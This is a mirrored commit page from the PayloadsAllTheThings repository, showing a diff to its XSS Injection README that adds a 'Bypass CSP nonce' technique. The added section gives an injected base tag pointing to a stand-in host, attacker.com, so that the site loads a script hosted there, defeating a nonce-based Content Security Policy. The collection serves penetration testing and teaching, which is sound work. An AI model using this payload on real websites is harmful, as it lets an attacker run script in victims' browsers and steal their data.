gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 07:40:34 -08:00
Code Issues Packages Projects Releases Wiki Activity

Bypass CSP, technique from #715

Browse Source
This commit is contained in:
Swissky
2024-11-02 12:26:45 +01:00
parent d0c4454ef2
commit 9866fef5b4
2 changed files with 32 additions and 10 deletions
Download Patch File Download Diff File Expand all files Collapse all files

22
XSS Injection/README.md
View File

@@ -83,6 +83,8 @@
- [Bypass CSP unsafe-inline](#bypass-csp-unsafe-inline)
- [Bypass CSP script-src self](#bypass-csp-script-src-self)
- [Bypass CSP script-src data](#bypass-csp-script-src-data)
- [Bypass CSP nonce](#bypass-csp-nonce)
- [Bypass CSP header sent by PHP](#bypass-csp-header-sent-by-php)
- [References](#references)
## Vulnerability Details
@@ -1308,6 +1310,26 @@ Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
```
### Bypass CSP nonce
**Requirements**:
* CSP like `script-src 'nonce-RANDOM_NONCE'`
* Imported JS file with a relative link: `<script src='/PATH.js'></script>`
**Payload**:
1. Inject a base tag.
```html
<base href=http://www.attacker.com>
```
2. Host your custom js file at the same path that one of the website's script.
```
http://www.attacker.com/PATH.js
```
### Bypass CSP header sent by PHP
**Requirements**: